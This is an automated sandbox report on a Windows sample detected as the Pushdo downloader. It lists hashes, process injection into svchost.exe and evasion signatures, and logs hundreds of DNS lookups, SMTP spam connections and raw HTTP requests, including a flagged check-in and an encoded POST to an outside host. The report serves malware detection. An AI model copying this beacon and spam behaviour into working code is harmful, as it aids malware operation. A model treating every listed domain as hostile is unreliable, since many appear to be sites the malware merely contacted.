Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PIyT9A3jfC.exe

Overview

General Information

Sample Name:PIyT9A3jfC.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
Analysis ID:1281447
MD5:ca67c9c17a701b0664b90de372acdfb1
SHA1:8d7e388b5d276816279ef37e7cab9cd554251737
SHA256:db47df7cf51747e533c968da7452f1ce6d20f465d7fcd6e2eac559266ac3e9ed
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Machine Learning detection for sample
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Connects to several IPs in different countries
Uses SMTP (mail sending)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • PIyT9A3jfC.exe (PID: 7016 cmdline: C:\Users\user\Desktop\PIyT9A3jfC.exe MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 4588 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 6632 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6532 cmdline: "C:\Users\user\pigalicapi.exe" MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 3616 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6664 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 3736 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 3788 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5328 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6764 cmdline: "C:\Users\user\pigalicapi.exe" MD5: CA67C9C17A701B0664B90DE372ACDFB1)
    • svchost.exe (PID: 6964 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.815888056.0000000000F20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000001.00000002.817368079.0000000001330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000004.00000002.815888334.00000000006A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        SourceRuleDescriptionAuthorStrings
        4.2.pigalicapi.exe.6a0000.0.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          1.2.PIyT9A3jfC.exe.1330000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            3.2.pigalicapi.exe.f20000.0.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              6.2.svchost.exe.4000000.4.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                1.2.PIyT9A3jfC.exe.1330000.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  Click to see the 3 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.4188.114.97.749682802016867 07/27/23-21:42:53.737718
                  SID:2016867
                  Source Port:49682
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: PIyT9A3jfC.exeReversingLabs: Detection: 26%
                  Source: PIyT9A3jfC.exeVirustotal: Detection: 34%Perma Link
                  Source: http://www.gpthink.com/c1Avira URL Cloud: Label: malware
                  Source: http://gpthink.com/product/204.htmlAvira URL Cloud: Label: malware
                  Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                  Source: https://www.aevga.com/Avira URL Cloud: Label: malware
                  Source: http://www.valselit.com/177-appartement-a-vendre-sigean-30378Avira URL Cloud: Label: malware
                  Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 26%
                  Source: PIyT9A3jfC.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeUnpacked PE file: 1.2.PIyT9A3jfC.exe.1330000.1.unpack
                  Source: PIyT9A3jfC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.4:50309 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:50321 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.4:50331 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:50302 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.4:55471 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.4:55464 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.4:55462 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.4:56189 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.4:56192 version: TLS 1.2
                  Source: PIyT9A3jfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01191989 FindFirstFileExW,1_2_01191989
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_01195EA0 FindFirstFileA,1_2_01195EA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC1989 FindFirstFileExW,3_2_00FC1989
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_00FC5EA0 FindFirstFileA,3_2_00FC5EA0

                  Networking

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.205.70.128 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.211.41.39 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.119.154.66 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.134.13.210 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 156.251.140.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.4.56.54 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.68.180 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.224 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.33.252 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.compuserve.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nels.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.69.141.67 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.4:49682 -> 188.114.97.7:80
                  Source: unknownDNS traffic detected: query: ascc.org.au replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amele.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: eos-i.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: iranytu.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cjcagent.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: pcoyuncu.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: workplus.hu replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                  Source: Joe Sandbox ViewASN Name: DEVINOTELECOM-ASRU DEVINOTELECOM-ASRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Joe Sandbox ViewIP Address: 185.205.70.128 185.205.70.128
                  Source: Joe Sandbox ViewIP Address: 103.224.212.221 103.224.212.221
                  Source: Joe Sandbox ViewIP Address: 103.224.212.221 103.224.212.221
                  Source: unknownNetwork traffic detected: DNS query count 375
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 68 48 4e 79 78 48 31 43 37 41 68 65 55 57 63 33 4e 43 45 68 55 62 62 37 68 4e 6d 72 34 34 32 6d 41 57 50 65 75 6d 6c 4c 59 51 7a 76 49 47 45 74 72 74 4f 54 50 35 6d 53 77 66 38 33 2f 4d 35 58 73 6e 6c 31 37 67 6e 76 48 4b 7a 6c 54 67 53 78 6a 6d 38 49 70 4b 4b 6c 72 48 65 79 72 54 58 71 6c 36 52 44 59 77 61 74 75 37 72 36 74 55 6e 75 45 54 4f 37 53 4e 56 32 2f 7a 65 4c 51 35 64 6b 63 74 79 70 74 4f 62 39 57 48 70 44 7a 72 78 6f 6e 4e 79 73 33 79 30 4e 4e 4f 47 53 35 71 2f 39 49 39 57 4d 62 39 6e 45 6a 30 63 71 6c 47 4d 54 70 41 4b 6f 6e 63 5a 37 70 42 53 74 37 51 4e 6a 56 30 71 39 43 54 69 63 68 4e 4d 74 70 4b 41 31 39 71 56 62 36 43 68 64 4f 34 34 61 66 77 65 35 41 32 31 39 31 71 64 6d 57 5a 6c 61 35 62 64 5a 39 6b 70 70 6a 46 32 75 6a 72 59 37 2b 4e 44 4b 69 63 41 6c 4a 37 74 45 72 51 51 32 2f 6e 7a 6b 6c 2b 32 59 30 72 62 55 5a 63 62 38 43 68 4a 55 48 61 68 39 4c 32 6a 44 68 76 47 4c 66 30 59 52 75 59 56 4f 6f 73 32 73 61 53 64 44 61 7a 44 68 57 64 66 73 79 61 32 49 52 32 4e 2b 39 33 6f 39 4f 4a 53 57 71 68 46 70 6c 46 48 43 47 